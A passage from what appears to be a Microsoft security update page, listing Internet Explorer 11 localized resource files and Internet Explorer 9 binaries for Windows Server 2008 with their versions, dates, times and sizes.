\nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 50,688 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 45,056 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 39,936 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 39,424 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 47,616 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 51,200 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 50,688 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 50,176 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 49,664 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 49,152 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 48,128 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 35,328 \nurlmon.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 35,328 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 10,752 
\noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 11,264 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 9,216 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 7,680 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 10,752 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 9,728 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 10,240 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 
18:39| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \noccache.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 6,656 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:58| 47,104 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 124,928 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 122,880 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 130,048 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 138,240 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 114,688 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 131,584 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 117,760 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 122,368 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 134,144 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 107,008 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 127,488 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 128,512 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 88,576 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 82,944 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 123,392 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 120,320 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 130,560 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 125,952 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 129,024 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 128,000 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 129,024 
\ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 124,416 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 121,856 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 115,712 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 125,440 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 72,704 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 73,728 \ninetcpl.cpl.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 73,728 \niedkcs32.dll| 18.0.9600.20112| 19-Aug-2021| 18:17| 341,920 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 20-Mar-2021| 20:53| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \niedvtool.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 772,608 \nDiagnosticsTap.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 175,104 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 
2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 2,048 \nF12Tools.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 256,000 \nmsfeedsbs.mof| Not versioned| 13-Aug-2021| 18:11| 1,574 \nmsfeedsbs.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 52,736 \nmsfeedssync.exe| 11.0.9600.20112| 13-Aug-2021| 20:04| 11,776 \nhtml.iec| 2019.0.0.20112| 13-Aug-2021| 20:03| 341,504 \nielowutil.exe| 11.0.9600.20112| 13-Aug-2021| 19:57| 221,184 \nieproxy.dll| 11.0.9600.20112| 13-Aug-2021| 19:14| 310,784 \nIEShims.dll| 11.0.9600.20112| 13-Aug-2021| 19:18| 290,304 \njsprofilerui.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 579,584 \nMshtmlDac.dll| 11.0.9600.20112| 13-Aug-2021| 20:02| 64,000 \nnetworkinspection.dll| 11.0.9600.20112| 13-Aug-2021| 19:39| 1,075,200 \nmsrating.dll| 11.0.9600.20112| 13-Aug-2021| 19:43| 168,960 \nicrav03.rat| Not versioned| 20-Mar-2021| 20:54| 8,798 
\nticrf.rat| Not versioned| 20-Mar-2021| 20:54| 1,988 \niertutil.dll| 11.0.9600.20112| 13-Aug-2021| 20:07| 2,308,608 \nsqmapi.dll| 6.2.9200.16384| 19-Aug-2021| 18:17| 228,232 \ninseng.dll| 11.0.9600.20112| 13-Aug-2021| 19:44| 91,136 \nVGX.dll| 11.0.9600.20112| 13-Aug-2021| 19:41| 818,176 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 2,066,432 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,121,216 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 2,063,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,314,240 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 2,390,528 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 2,033,152 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 2,255,872 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 2,061,312 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 2,326,016 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,019,840 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 2,071,040 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 2,082,816 \nieui.dll.mui| 
11.0.9600.20112| 19-Aug-2021| 18:26| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,307,584 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 2,170,368 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 2,153,984 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,291,712 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 2,283,520 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 2,052,096 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,301,952 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 2,093,056 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 2,075,648 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,299,392 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 2,094,592 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 2,316,800 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,305,536 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 2,278,912 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,285,568 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 3,584 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 2,060,288 \nieui.dll.mui| 
11.0.9600.20112| 19-Aug-2021| 18:36| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 2,315,776 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 2,279,424 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,324,992 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 2,098,176 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 3,072 \nieframe.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 1,890,304 \nieui.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 3,072 \nieinstal.exe| 11.0.9600.20112| 13-Aug-2021| 19:41| 475,648 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,184 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:18| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:19| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:20| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 35,328 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:21| 37,888 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 20:19| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:22| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:23| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:24| 27,648 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:25| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:26| 33,792 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:27| 23,040 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:28| 22,016 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 
29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:29| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 31,232 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:30| 34,304 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:31| 35,840 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:32| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:33| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 34,816 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:34| 33,280 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:35| 32,256 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:36| 32,768 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:37| 30,720 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:38| 29,696 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,384 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:39| 16,896 \njscript9.dll.mui| 11.0.9600.20112| 19-Aug-2021| 18:40| 16,896 \n \n### **Windows Server 2008**\n\n### \n\n__\n\nInternet Explorer 9 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,142,784 \niexplore.exe| 9.0.8112.21591| 9-Sep-2021| 2:17| 751,512 \ninetcpl.cpl| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,427,968 \nwininet.dll| 9.0.8112.21591| 9-Sep-2021| 2:06| 1,132,544 \njsproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 75,776 \nWininetPlugin.dll| 1.0.0.1| 9-Sep-2021| 2:05| 66,048 \ntdc.ocx| 9.0.8112.21591| 9-Sep-2021| 2:05| 63,488 \niedvtool.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 678,912 \ndxtmsft.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 354,304 \ndxtrans.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,744 \nmsfeeds.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 607,744 \nmsfeeds.mof| 
Not versioned| 9-Sep-2021| 1:40| 1,518 \nmsfeedsbs.mof| Not versioned| 9-Sep-2021| 1:40| 1,574 \nmsfeedsbs.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 41,472 \nmsfeedssync.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 10,752 \nmshta.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 11,776 \nhtml.iec| 2019.0.0.21586| 9-Sep-2021| 2:08| 367,616 \nmshtmled.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 72,704 \nmshtml.dll| 9.0.8112.21591| 9-Sep-2021| 2:10| 12,845,056 \nmshtml.tlb| 9.0.8112.21591| 9-Sep-2021| 2:05| 2,382,848 \nielowutil.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 223,232 \nieproxy.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 195,072 \nIEShims.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 194,560 \nExtExport.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 22,528 \nWindows Pop-up Blocked.wav| Not versioned| 11-Mar-2021| 0:00| 85,548 \nWindows Information Bar.wav| Not versioned| 11-Mar-2021| 0:00| 23,308 \nWindows Feed Discovered.wav| Not versioned| 11-Mar-2021| 0:00| 19,884 \nWindows Navigation Start.wav| Not versioned| 11-Mar-2021| 0:00| 11,340 \nieUnatt.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 142,848 \njsdbgui.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 387,584 \niertutil.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 9-Sep-2021| 2:17| 142,744 \nVGX.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 769,024 \nurl.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 231,936 \nieframe.dll| 9.0.8112.21591| 9-Sep-2021| 2:07| 9,757,696 \nieui.dll| 9.0.8112.21591| 9-Sep-2021| 2:03| 176,640 \nieinstal.exe| 9.0.8112.21591| 9-Sep-2021| 2:05| 474,624 \nInetRes.adml| Not versioned| 9-Sep-2021| 2:23| 393,813 \ninetres.admx| Not versioned| 11-Mar-2021| 0:10| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21591| 9-Sep-2021| 2:05| 104,448 \njscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 723,456 \njscript9.dll| 9.0.8112.21591| 9-Sep-2021| 2:11| 1,819,648 \nvbscript.dll| 5.8.7601.21586| 9-Sep-2021| 2:05| 434,176 \n \n### \n\n__\n\nInternet Explorer 9 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| 
**Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21591| 9-Sep-2021| 3:16| 1,391,616 \niexplore.exe| 9.0.8112.21591| 9-Sep-2021| 3:31| 757,656 \ninetcpl.cpl| 9.0.8112.21591| 9-Sep-2021| 3:15| 1,494,528 \nwininet.dll| 9.0.8112.21591| 9-Sep-2021| 3:16| 1,395,200 \njsproxy.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 97,280 \nWininetPlugin.dll| 1.0.0.1| 9-Sep-2021| 3:15| 86,528 \ntdc.ocx| 9.0.8112.21591| 9-Sep-2021| 3:14| 76,800 \niedvtool.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 887,808 \ndxtmsft.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 452,608 \ndxtrans.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 281,600 \nmsfeeds.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 729,088 \nmsfeeds.mof| Not versioned| 9-Sep-2021| 2:48| 1,518 \nmsfeedsbs.mof| Not versioned| 9-Sep-2021| 2:48| 1,574 \nmsfeedsbs.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 55,296 \nmsfeedssync.exe| 9.0.8112.21591| 9-Sep-2021| 3:14| 11,264 \nmshta.exe| 9.0.8112.21591| 9-Sep-2021| 3:14| 12,800 \nhtml.iec| 2019.0.0.21586| 9-Sep-2021| 3:19| 448,512 \nmshtmled.dll| 9.0.8112.21591| 9-Sep-2021| 3:14| 96,256 \nmshtml.dll| 9.0.8112.21591| 9-Sep-2021| 3:24| 18,812,416 \nmshtml.tlb| 9.0.8112.21591| 9-Sep-2021| 3:14| 2,382,848 \nielowutil.exe| 9.0.8112.21591| 9-Sep-2021| 3:15| 223,744 \nieproxy.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 550,912 \nIEShims.dll| 9.0.8112.21591| 9-Sep-2021| 3:15| 305,664 \nWindows Pop-up Blocked.wav| Not versioned| 11-Mar-2021| 0:00| 85,548 \nWindows Information Bar.wav| Not versioned| 11-Mar-2021| 0:00| 23,308 \nWindows Feed Discovered.wav| Not versioned| 11-Mar-2021| 0:00| 19,884 \nWindows Navigation Start.wav| Not versioned| 11-Mar-2021| 0:00| 11,340 \nieUnatt.exe| 